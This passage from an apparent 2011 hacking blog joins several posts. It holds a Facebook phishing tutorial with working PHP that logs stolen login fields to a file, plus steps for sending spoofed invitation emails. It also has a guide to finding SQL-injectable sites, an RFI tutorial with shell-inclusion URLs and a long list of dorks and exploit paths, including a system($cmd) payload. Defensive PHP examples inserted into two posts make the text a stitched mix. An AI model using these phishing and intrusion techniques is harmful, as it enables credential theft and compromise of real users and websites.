self-contained and use networks to spread, in much the same way viruses <br />
use files to spread. Some people say the solution to viruses and worms <br />
is to just not have any files or networks. They are probably correct. <br />
We would include computers. <br />
</span></i><b><span style="font-size: medium; line-height: normal;"><span style="color: #7030a0;">Logic Bomb:</span></span></b><i><span style="font-size: medium; line-height: normal;"> <br />
Code which will trigger a particular form of 'attack' when a <br />
designated condition is met. For instance, a logic bomb could delete <br />
all files on Dec. 5th. Unlike a virus, a logic bomb does not make <br />
copies of itself. <br />
</span></i> </div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-3299468824600484367.post-81775018152919906492011-08-29T02:36:00.000-07:002011-08-29T02:36:27.851-07:00How to Phish / Spoof FACEBOOK! (with pictures), Hack FB id<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><b><span style="font-size: small;">Now I'm gonna make a step-by-step tutorial on phishing Facebook accounts. <br />
<br />
WITH PICTURES!!! </span><span style="font-size: small;"><br />
<br />
<br />
<br />
ONE!: </span><span style="font-size: small;"><br />
<br />
go to "www.facebook.com/login.php" and right click on some white space </span><span style="font-size: small;"><br />
on the page and press "view source code". A lot of text is gonna appear; <br />
copy it all to notepad. <br />
<br />
<br />
<br />
TWO!: </span><span style="font-size: small;"><br />
<br />
Now we need to change a few things in the code. So that the login button </span><span style="font-size: small;"><br />
sends the info to our file instead of the facebook login. We do that by <br />
editing the action attribute of the login form. So press Edit >> Search and <br />
search for "action=" without the quotes. You should find this: <br />
<br />
<br />
<br />
<img alt="Board Image" src="http://img354.imageshack.us/img354/7116/screen1pf8.png" /></span> <span style="font-size: small;"><br />
<br />
The big red ring that circles the "action=" you have to change. You have </span><span style="font-size: small;"><br />
to change it to 'action="next.php"'. After you have done that, you <br />
should change the method (small red circle on the picture) to "get" <br />
instead of "post", or else it will not work (next.php below reads the fields from $_GET). Save the document as <br />
"index.PHP" (not htm!) <br />
<br />
<br />
<br />
THREE!: </span><span style="font-size: small;"><br />
<br />
Now that we changed the action to next.php, we also need to make a "next.php". Open up Notepad again and write this: </span><span style="font-size: small;"><br />
<br />
</span> <span style="font-size: small;"> <br />
<br />
<br />
<br />
<?php <br />
<br />
header("Location: </span><span style="font-size: small;"><a href="http://www.facebook.com/login.php" target="_blank">http://www.Facebook.com/login.php</a> "); <br />
<br />
$handle = fopen("passwords.txt", "a"); </span><span style="font-size: small;"><br />
<br />
foreach($_GET as $variable => $value) { </span><span style="font-size: small;"><br />
<br />
fwrite($handle, $variable); </span><span style="font-size: small;"><br />
<br />
fwrite($handle, "="); </span><span style="font-size: small;"><br />
<br />
fwrite($handle, $value); </span><span style="font-size: small;"><br />
<br />
fwrite($handle, "\r\n"); </span><span style="font-size: small;"><br />
<br />
} </span><span style="font-size: small;"><br />
<br />
fwrite($handle, "\r\n"); </span><span style="font-size: small;"><br />
<br />
fclose($handle); </span><span style="font-size: small;"><br />
<br />
exit; </span><span style="font-size: small;"><br />
<br />
?> </span><span style="font-size: small;"><br />
<br />
<br />
<br />
Save this as "next.php" <br />
<br />
<br />
<br />
Note: for security you should rename "passwords.txt" to something else. </span><span style="font-size: small;"><br />
<br />
Now make a text file called "passwords.txt" (or whatever you renamed the file to in "next.php") and leave this document blank. </span><span style="font-size: small;"><br />
<br />
<br />
<br />
FOUR!: </span><span style="font-size: small;"><br />
<br />
Upload the 3 files "index.php", "next.php" and "passwords.txt" (or </span><span style="font-size: small;"><br />
whatever the password file is called) to a subdomain hosting site. THEY <br />
MUST SUPPORT .PHP! I suggest these: 110mb.com, spam.com or 007sites.com. <br />
Once you have made an account, upload the 3 files. <br />
<br />
<br />
<br />
Congratz. You have yourself a working Phisher site! </span><span style="font-size: small;"><br />
<br />
<br />
<br />
FIVE!: </span><span style="font-size: small;"><br />
<br />
Now we would like to send spoof emails out. To do that we should first </span><span style="font-size: small;"><br />
make an email account which starts with facebook@, or something that <br />
looks alike, like <a href="mailto:FACEB0OK@hotmail.com" target="_blank">FACEB0OK@hotmail.com</a>. You should use either Gmail, Live, or Hotmail, or you could get a mail like "facebook@noreply.com" or something like that, but eventually that would cost. When your email is set, go to step six. <br />
<br />
<br />
<br />
SIX!: </span><span style="font-size: small;"><br />
<br />
Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DON'T SEND YET! </span><span style="font-size: small;"><br />
<br />
remove the hyperlink from this link: </span><span style="font-size: small;"><br />
<br />
http://www.facebook.com/n/?reqs.php </span><span style="font-size: small;"><br />
<br />
Mark it and push the Add hyperlink button </span><span style="font-size: small;"><br />
<br />
<br />
<br />
<img alt="Board Image" src="http://img117.imageshack.us/img117/6243/screen2jj5.png" /></span> <span style="font-size: small;"><br />
<br />
<br />
<br />
The Add hyperlink button is in the red circle. Now write your phisher page URL </span><span style="font-size: small;"><br />
in the hyperlink bar that appears after clicking the button, and click <br />
Add. The hyperlink should still display <br />
http://www.facebook.com/n/?reqs.php <br />
<br />
but lead to your phisher page. That's pretty kewl. Now I believe you're </span><span style="font-size: small;"><br />
ready to send your spoof emails to everybody you know, and hopefully <br />
some of them will fall for it. </span></b> </div></div>Unknownnoreply@blogger.com135tag:blogger.com,1999:blog-3299468824600484367.post-22874816689964548252011-08-29T02:34:00.001-07:002011-08-29T02:34:38.845-07:00How to search Vulnerable site<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>1-) First go to <a href="http://www.google.com/" target="_blank">http://www.google.com</a></b> <b><br />
<br />
<br />
</b> <b>2-) Press on the right, next to the textfield, on "Advanced Search". <br />
<br />
<br />
<br />
<img alt="Board Image" src="http://i47.tinypic.com/2nbf67c.png" /></b> <b><br />
<br />
<br />
</b> <b>3-) Fill in your dork at "This exact wording or phrase". <br />
</b> <b> Results per page: 100 results (Or less depending on your internet speed.) <br />
</b> <b> Language: Could be all languages or one language. I choose Dutch <br />
because I'm Dutch myself and I got a Dutch ISP so those sites will load <br />
faster. <br />
</b> <b> Where your keywords show up: "in the URL of the page" <br />
<br />
<br />
</b> <b>4-) Press search. <br />
<br />
<br />
</b> <b>5-) Now we get this: <br />
<br />
<br />
<br />
<img alt="Board Image" src="http://i47.tinypic.com/2z5uqvl.png" /></b> <b><br />
<br />
<br />
</b> <b>6-) Press on about 10 links with your middle mouse button (scroll wheel) so each page opens in a new tab. <br />
<br />
<br />
</b> <b>7-) Open the tabs and, for example, append a single quote (') to the parameter value at the end of the URL. <br />
<br />
<br />
</b> <b>8-) If the page now throws a database error (the quote breaks the SQL string) or its content changes, it is probably vulnerable: continue your injection. Otherwise repeat steps 5 -> 6. <br />
<br />
<br />
<br />
Very easy (: </b><b><br />
<br />
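What the single-quote test in step 7 actually trips over, as an added example that is not part of the original post: a query built by pasting the URL parameter into the SQL string, beside the prepared-statement version that treats the quote as plain data. It uses an in-memory SQLite database through PDO so it runs stand-alone; the news table, its columns and the function names are assumptions made for this illustration. <br />

```php
<?php
// Added example, not code from the original post: what the single-quote test in
// step 7 does to a query built by string concatenation, beside the prepared
// statement that does not break. Runs stand-alone on an in-memory SQLite DB;
// the "news" table and its columns are assumptions made for this illustration.

function setupDemoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO news (id, title) VALUES (1, 'Hello')");
    return $pdo;
}

// VULNERABLE: the URL parameter is pasted into the SQL text, so a quote in the
// value closes the string literal early and the rest is parsed as SQL.
function fetchTitleUnsafe(PDO $pdo, string $id): ?string
{
    $sql = "SELECT title FROM news WHERE id = '" . $id . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['title'];
}

// HARDENED: the SQL text is fixed and the value is bound separately, so a quote
// (or anything else) in it is only ever data, never syntax.
function fetchTitleSafe(PDO $pdo, string $id): ?string
{
    $stmt = $pdo->prepare('SELECT title FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['title'];
}

$pdo = setupDemoDb();
// Constructed inputs: the normal value, then the same value with the quote test.
foreach (['1', "1'"] as $input) {
    try {
        printf("unsafe %-3s => %s\n", $input, fetchTitleUnsafe($pdo, $input) ?? 'no row');
    } catch (PDOException $e) {
        // This is the error a vulnerable page leaks, and what the quote test is looking for.
        printf("unsafe %-3s => SQL ERROR: %s\n", $input, $e->getMessage());
    }
    printf("safe   %-3s => %s\n", $input, fetchTitleSafe($pdo, $input) ?? 'no row');
}
```

Run it with php from the command line. The concatenated query fails with a syntax error for the input 1', which is exactly the error page the quote test is hunting for; the prepared statement simply returns no row, because the quote never reaches the SQL parser as syntax. Switching display_errors off only hides the message from the visitor and does not remove the injection; binding the parameter does. <br />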
With this method I can find about 30 vulnerable websites in less than 2 hours and a few websites to upload a shell to. </b></span> </div></div>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-3299468824600484367.post-75990331509118403992011-08-27T22:05:00.001-07:002011-08-27T22:05:25.046-07:00Apple Website Hacked by HodLuM<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;"><span class="Apple-style-span" style="font-size: medium;"><b><span class="Apple-style-span" style="color: red;"></span></b></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxUi4xMDAgNcYylb7ocQHV3CqZe4ajA4v_sKMyyOdt9ZxYs6eLfHyY4ECBgbDwHDu59EwZaotzBZXkJI_AAHGJmyZ_laAJYhzBS9FyKtAPeT7tjgZsPNLhmNW12MOi6iOACb_wbTMub9k/s1600/Untitled.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxUi4xMDAgNcYylb7ocQHV3CqZe4ajA4v_sKMyyOdt9ZxYs6eLfHyY4ECBgbDwHDu59EwZaotzBZXkJI_AAHGJmyZ_laAJYhzBS9FyKtAPeT7tjgZsPNLhmNW12MOi6iOACb_wbTMub9k/s640/Untitled.png" width="616" /></a></div><br />
</div>One of Apple's <a href="http://edseminars.apple.com/seminars/eventfiles/668/0wnz.jpg"><b>sub-domains</b></a> is claimed to have been defaced by <b><span class="Apple-style-span" style="color: #990000;">HodLuM</span></b>, as shown above. The deface link is just an image uploaded to an Apple domain. The hacker uses the word "<b>N00BZ</b>" for all other hackers, including Anonymous, LulzSec, Turkish hackers, Inj3t0rs and Exploit-DB. The AOL Postmaster <a href="http://www.thehackernews.com/2011/08/aol-postmaster-website-hacked-by-hodlum.html">website</a> was also hacked by HODLUM some months earlier.</div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-45705076881996861542011-08-27T21:40:00.000-07:002011-08-27T21:40:18.067-07:00RFI - Remote File Inclusion.<div dir="ltr" style="text-align: left;" trbidi="on"><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Today I will be teaching you guys RFI (Remote File Inclusion).<br />
<br />
<span style="text-decoration: underline;">What is RFI?</span> <br />
RFI is a very uncommon vulnerability these days: PHP has shipped with allow_url_include switched off by default since 5.2, and most of the affected applications have long been patched, so you will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites; many users of HackForums have dorks for searching for RFI vulnerable websites, as well as lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion, is exactly what its name says: you include a file onto the website remotely, by handing a URL to a script that passes it straight to include().<br />
<br />
<span style="text-decoration: underline;">What makes a page vulnerable?</span> <br />
A PHP include script looks like this.<br />
<br />
</b></span> </div><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><?php<br />
include($_GET['p']);<br />
?></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Since the code uses 'p' the syntax would be:<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://victimsite.com/index.php?p=URL_TO_SHELL.txt?</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
If the script looks like this:<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code><?php<br />
include($_GET['lulz']);<br />
?></code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
The syntax would then be:<br />
</span><span style="color: #666666;"> </span></b></span> <div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?</code></b></span></div></div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Understood?<br />
<br />
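The include shown above, beside a version that cannot be pointed at a remote (or unexpected local) file. This is an added example, not code from the original post; the pages/ file names, the PAGES map and the function names are assumptions made for the illustration. <br />

```php
<?php
// Added example, not code from the original post: the vulnerable dispatcher
// described in the text beside a hardened one. The files under pages/ and the
// PAGES map are assumptions made for this illustration.

// VULNERABLE: ?p= goes straight into include(). With allow_url_include=On in
// php.ini the value may be a URL (remote file inclusion); even with it Off, a
// value such as ../../../etc/passwd still reads local files.
function renderPageUnsafe(array $get): void
{
    include($get['p']);
}

// HARDENED: the request parameter is only ever a key into a fixed map of files
// shipped with the application; the raw value never becomes part of a path.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Returns the relative file for a page key, or null for anything not listed.
function pageFileFor(?string $p): ?string
{
    if ($p === null || !array_key_exists($p, PAGES)) {
        return null;                      // unknown key: refuse, do not guess
    }
    return PAGES[$p];
}

function renderPage(array $get): void
{
    $rel = pageFileFor($get['p'] ?? null);
    if ($rel === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // Second check: the resolved file must exist and lie under the app root,
    // so even a typo in PAGES cannot reach outside it.
    $root = realpath(__DIR__);
    $file = realpath($root . '/' . $rel);
    if ($file === false || strpos($file, $root . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;
}

// Constructed inputs run through the allow-list only (nothing is included here).
foreach (['home', 'about', '../../../etc/passwd', 'http://evil.example/shell.txt?'] as $input) {
    printf("%-32s => %s\n", $input, pageFileFor($input) ?? 'REJECTED');
}
```

Two things to check on a real host. In php.ini, allow_url_include must be Off (it has defaulted to Off since PHP 5.2.0 and is separate from allow_url_fopen): with it Off, include() refuses the http:// and ftp:// wrappers outright, which is why RFI is rare today, but ../ paths into local files still work, so the allow-list is still needed. And appending a fixed suffix such as .php to the parameter is not a fix: the trailing ? on the URL_TO_SHELL.txt? payload above exists precisely to turn any appended suffix into a query string on the remote request. <br />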
<span style="text-decoration: underline;">What can I accomplish with RFI?</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
You can include your PHP shells onto the website (GNYShell, C99, etc).<br />
You can include just about any file onto the website.<br />
<br />
<span style="text-decoration: underline;">How can I search for RFI vulnerable sites?</span></span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
Using dorks, exploit scanners, etc.<br />
<br />
Here is a list of RFI dorks:</span><span style="color: #666666;"> </span><span style="color: #666666;"><br />
</span><span style="color: #666666;"> </span></b></span><div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;"> <div class="title"><span style="font-size: small;"><b>Code:</b></span> </div><div class="body" dir="ltr"><span style="font-size: small;"><b><code>inurl:/modules/My_eGallery/public/displayCategory.php?basepath=<br />
<br />
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=<br />
<br />
inurl:/include/new-visitor.inc.php?lvc_include_dir=<br />
<br />
inurl:/_functions.php?prefix=<br />
<br />
inurl:/cpcommerce/_functions.php?prefix=<br />
<br />
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=<br />
<br />
inurl:/modules/agendax/addevent.inc.php?agendax_path=<br />
<br />
inurl:/ashnews.php?pathtoashnews=<br />
<br />
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=<br />
<br />
inurl:/pm/lib.inc.php?pm_path=<br />
<br />
inurl:/b2-tools/gm-2-b2.php?b2inc=<br />
<br />
inurl:/includes/include_once.php?include_file=<br />
<br />
inurl:/e107/e107_handlers/secure_img_render.php?p=<br />
<br />
inurl:/shoutbox/expanded.php?conf=<br />
<br />
inurl:/main.php?x=<br />
<br />
inurl:/myPHPCalendar/admin.php?cal_dir=<br />
<br />
inurl:/index.php/main.php?x=<br />
<br />
inurl:/index.php?include=<br />
<br />
inurl:/index.php?x=<br />
<br />
inurl:/index.php?open=<br />
<br />
inurl:/index.php?visualizar=<br />
<br />
inurl:/template.php?pagina=<br />
<br />
inurl:/index.php?pagina=<br />
<br />
inurl:/index.php?inc=<br />
<br />
inurl:/includes/include_onde.php?include_file=<br />
<br />
inurl:/index.php?page=<br />
<br />
inurl:/index.php?pg=<br />
<br />
inurl:/index.php?show=<br />
<br />
inurl:/index.php?cat=<br />
<br />
inurl:/index.php?file=<br />
<br />
inurl:/db.php?path_local=<br />
<br />
inurl:/index.php?site=<br />
<br />
inurl:/htmltonuke.php?filnavn=<br />
<br />
inurl:/livehelp/inc/pipe.php?HCL_path=<br />
<br />
inurl:/hcl/inc/pipe.php?HCL_path=<br />
<br />
inurl:/inc/pipe.php?HCL_path=<br />
<br />
inurl:/support/faq/inc/pipe.php?HCL_path=<br />
<br />
inurl:/help/faq/inc/pipe.php?HCL_path=<br />
<br />
inurl:/helpcenter/inc/pipe.php?HCL_path=<br />
<br />
inurl:/live-support/inc/pipe.php?HCL_path=<br />
<br />
inurl:/gnu3/index.php?doc=<br />
<br />
inurl:/gnu/index.php?doc=<br />
<br />
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=<br />
<br />
inurl:/forum/install.php?phpbb_root_dir=<br />
<br />
inurl:/includes/calendar.php?phpc_root_path=<br />
<br />
inurl:/includes/setup.php?phpc_root_path=<br />
<br />
inurl:/inc/authform.inc.php?path_pre=<br />
<br />
inurl:/include/authform.inc.php?path_pre=<br />
<br />
inurl:index.php?nic=<br />
<br />
inurl:index.php?sec=<br />
<br />
inurl:index.php?content=<br />
<br />
inurl:index.php?link=<br />
<br />
inurl:index.php?filename=<br />
<br />
inurl:index.php?dir=<br />
<br />
inurl:index.php?document=<br />
<br />
inurl:index.php?view=<br />
<br />
inurl:*.php?sel=<br />
<br />
inurl:*.php?session=&content=<br />
<br />
inurl:*.php?locate=<br />
<br />
inurl:*.php?place=<br />
<br />
inurl:*.php?layout=<br />
<br />
inurl:*.php?go=<br />
<br />
inurl:*.php?catch=<br />
<br />
inurl:*.php?mode=<br />
<br />
inurl:*.php?name=<br />
<br />
inurl:*.php?loc=<br />
<br />
inurl:*.php?f=<br />
<br />
inurl:*.php?inf=<br />
<br />
inurl:*.php?pg=<br />
<br />
inurl:*.php?load=<br />
<br />
inurl:*.php?naam=<br />
<br />
allinurl:/index.php?page= site:*.dk<br />
<br />
allinurl:/index.php?file= site:*.dk<br />
<br />
INURL OR ALLINURL WITH:<br />
<br />
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=<br />
<br />
/includes/header.php?systempath=<br />
<br />
/Gallery/displayCategory.php?basepath=<br />
<br />
/index.inc.php?PATH_Includes=<br />
<br />
/ashnews.php?pathtoashnews=<br />
<br />
/ashheadlines.php?pathtoashnews=<br />
<br />
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br />
<br />
/demo/includes/init.php?user_inc=<br />
<br />
/jaf/index.php?show=<br />
<br />
/inc/shows.inc.php?cutepath=<br />
<br />
/poll/admin/common.inc.php?base_path=<br />
<br />
/pollvote/pollvote.php?pollname=<br />
<br />
/sources/post.php?fil_config=<br />
<br />
/modules/My_eGallery/public/displayCategory.php?basepath=<br />
<br />
/bb_lib/checkdb.inc.php?libpach=<br />
<br />
/include/livre_include.php?no_connect=lol&chem_absolu=<br />
<br />
/index.php?from_market=Y&pageurl=<br />
<br />
/modules/mod_mainmenu.php?mosConfig_absolute_path=<br />
<br />
/pivot/modules/module_db.php?pivot_path=<br />
<br />
/modules/4nAlbum/public/displayCategory.php?basepath=<br />
<br />
/derniers_commentaires.php?rep=<br />
<br />
/modules/coppermine/themes/default/theme.php?THEME_DIR=<br />
<br />
/modules/coppermine/include/init.inc.php?CPG_M_DIR=<br />
<br />
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=<br />
<br />
/coppermine/themes/maze/theme.php?THEME_DIR=<br />
<br />
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=<br />
<br />
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=<br />
<br />
/myPHPCalendar/admin.php?cal_dir=<br />
<br />
/agendax/addevent.inc.php?agendax_path=<br />
<br />
/modules/mod_mainmenu.php?mosConfig_absolute_path=<br />
<br />
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=<br />
<br />
/main.php?page=<br />
<br />
/default.php?page=<br />
<br />
/index.php?action=<br />
<br />
/index1.php?p=<br />
<br />
/index2.php?x=<br />
<br />
/index2.php?content=<br />
<br />
/index.php?conteudo=<br />
<br />
/index.php?cat=<br />
<br />
/include/new-visitor.inc.php?lvc_include_dir=<br />
<br />
/modules/agendax/addevent.inc.php?agendax_path=<br />
<br />
/shoutbox/expanded.php?conf=<br />
<br />
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br />
<br />
/pivot/modules/module_db.php?pivot_path=<br />
<br />
/library/editor/editor.php?root=<br />
<br />
/library/lib.php?root=<br />
<br />
/e107/e107_handlers/secure_img_render.php?p=<br />
<br />
/zentrack/index.php?configFile=<br />
<br />
/main.php?x=<br />
<br />
/becommunity/community/index.php?pageurl=<br />
<br />
/GradeMap/index.php?page=<br />
<br />
/index4.php?body=<br />
<br />
/side/index.php?side=<br />
<br />
/main.php?page=<br />
<br />
/es/index.php?action=<br />
<br />
/index.php?sec=<br />
<br />
/index.php?main=<br />
<br />
/index.php?sec=<br />
<br />
/index.php?menu=<br />
<br />
/html/page.php?page=<br />
<br />
/page.php?view=<br />
<br />
/index.php?menu=<br />
<br />
/main.php?view=<br />
<br />
/index.php?page=<br />
<br />
/content.php?page=<br />
<br />
/main.php?page=<br />
<br />
/index.php?x=<br />
<br />
/main_site.php?page=<br />
<br />
/index.php?L2=<br />
<br />
/content.php?page=<br />
<br />
/main.php?page=<br />
<br />
/index.php?x=<br />
<br />
/main_site.php?page=<br />
<br />
/index.php?L2=<br />
<br />
/index.php?show=<br />
<br />
/tutorials/print.php?page=<br />
<br />
/index.php?page=<br />
<br />
/index.php?level=<br />
<br />
/index.php?file=<br />
<br />
/index.php?inter_url=<br />
<br />
/index.php?page=<br />
<br />
/index2.php?menu=<br />
<br />
/index.php?level=<br />
<br />
/index1.php?main=<br />
<br />
/index1.php?nav=<br />
<br />
/index1.php?link=<br />
<br />
/index2.php?page=<br />
<br />
/index.php?myContent=<br />
<br />
/index.php?TWC=<br />
<br />
/index.php?sec=<br />
<br />
/index1.php?main=<br />
<br />
/index2.php?page=<br />
<br />
/index.php?babInstallPath=<br />
<br />
/main.php?body=<br />
<br />
/index.php?z=<br />
<br />
/main.php?view=<br />
<br />
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=<br />
<br />
/index.php?file=<br />
<br />
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=<br />
<br />
1. allinurl:my_egallery site:.org<br />
/modules/My_eGallery/public/displayCategory.php?basepath=<br />
<br />
2. allinurl:xgallery site:.org<br />
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=<br />
<br />
3. allinurl:coppermine site:.org<br />
/modules/coppermine/themes/default/theme.php?THEME_DIR=<br />
<br />
4. allinurl:4nAlbum site:.org<br />
/modules/4nAlbum/public/displayCategory.php?basepath=<br />
<br />
5. allinurlP:NphpBB2 site:.org<br />
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=<br />
<br />
6. allinurl:ihm.php?p=<br />
<br />
7. Keyword : "powered by AllMyLinks"<br />
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=<br />
<br />
8. allinurl:/modules.php?name=allmyguests<br />
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=<br />
<br />
9. allinurl:/Popper/index.php?<br />
/Popper/index.php?childwindow.inc.php?form=<br />
<br />
10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php<br />
yahoo = by Kietu? v 3.2<br />
/kietu/index.php?kietu[url_hit]=<br />
<br />
11. keyword : "Powered by phpBB 2.0.6"<br />
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=<br />
<br />
12. keyword : "powered by CubeCart 3.0.6"<br />
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=<br />
<br />
13. keyword : "powered by paBugs 2.0 Beta 3"<br />
/class.mysql.php?path_to_bt_dir=<br />
<br />
14. allinurl:"powered by AshNews", allinurl:AshNews or allinurl: /ashnews.php<br />
/ashnews.php?pathtoashnews=<br />
<br />
15. keyword : /phorum/login.php<br />
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=<br />
<br />
16. allinurl:ihm.php?p=*<br />
<br />
14. keyword : "powered eyeOs"<br />
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id<br />
replaced with:<br />
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d); &a=<br />
<br />
15. allinurl:.php?bodyfile=<br />
<br />
16. allinurl:/includes/orderSuccess.inc.php?glob=<br />
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=<br />
<br />
17. allinurl:forums.html<br />
/modules.php?name=<br />
<br />
18. allinurl:/default.php?page=home<br />
<br />
19. allinurl:/folder.php?id=<br />
<br />
20. allinurl:main.php?pagina=<br />
/paginedinamiche/main.php?pagina=<br />
<br />
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")<br />
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=<br />
<br />
22. allinurl:application.php?base_path=<br />
/application.php?base_path=<br />
<br />
23. allinurlp:hplivehelper<br />
/phplivehelper/initiate.php?abs_path=<br />
<br />
24. allinurlp:hpnuke<br />
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=<br />
<br />
25. key word : "powered by Fantastic News v2.1.2"<br />
/archive.php?CONFIG[script_path]=<br />
<br />
26. keyword: "powered by smartblog" AND inurl:?page=login<br />
/index.php?page=<br />
<br />
27. allinurl:/forum/<br />
/forum/admin/index.php?inc_conf=<br />
<br />
28. keyword:"Powered By FusionPHP"<br />
/templates/headline_temp.php?nst_inc=<br />
<br />
29. allinurl:shoutbox/expanded.php filetypep:hp<br />
/shoutbox/expanded.php?conf=<br />
<br />
30. allinurl: /osticket/<br />
/osticket/include/main.php?config[search_disp]=true&include_dir=<br />
<br />
31. keyword : "Powered by iUser"<br />
/common.php?include_path=<br />
<br />
32. allinurl: "static.php?load="<br />
/static.php?load=<br />
<br />
33. keyword : /phpcoin/login.php<br />
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=<br />
<br />
34. keyword: allinurl:/phpGedview/login.php site:<br />
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=<br />
<br />
35. allinurl:/folder.php?id=<br />
/classes.php?LOCAL_PATH=<br />
<br />
inurl:"/lire.php?rub="<br />
<br />
inurl:"/os/pointer.php?url="<br />
<br />
inurl:"folder.php?id="<br />
<br />
inurl:"show.php?page="<br />
<br />
inurl:"index2.php?DoAction="<br />
<br />
inurl:"index.php?canal="<br />
<br />
inurl:"index.php?screen="<br />
<br />
inurl:"index.php?langc="<br />
<br />
inurl:"index.php?Language="<br />
<br />
inurl:"view.php?page="<br />
<br />
dork: "powered by doodle cart"<br />
rfi of this dork: enc/content.php?Home_Path=<br />
<br />
dork: "Login to Calendar"<br />
rfi of this dork: /embed/day.php?path=<br />
<br />
dork: "powered by EQdkp"<br />
rfi of this dork: /includes/dbal.php?eqdkp_root_path=<br />
<br />
inurl:"template.php?goto="<br />
<br />
inurl:"video.php?content="<br />
<br />
inurl:"pages.php?page="<br />
<br />
inurl:"index1.php?choix="<br />
<br />
inurl:"index1.php?menu="<br />
<br />
inurl:"index2.php?ascii_seite="<br />
<br />
dork: inurl:surveys<br />
rfi to this dork: /surveys/survey.inc.php?path=<br />
<br />
inurl:"index.php?body="<br />
<br />
dork: allinurl:adobt sitel<br />
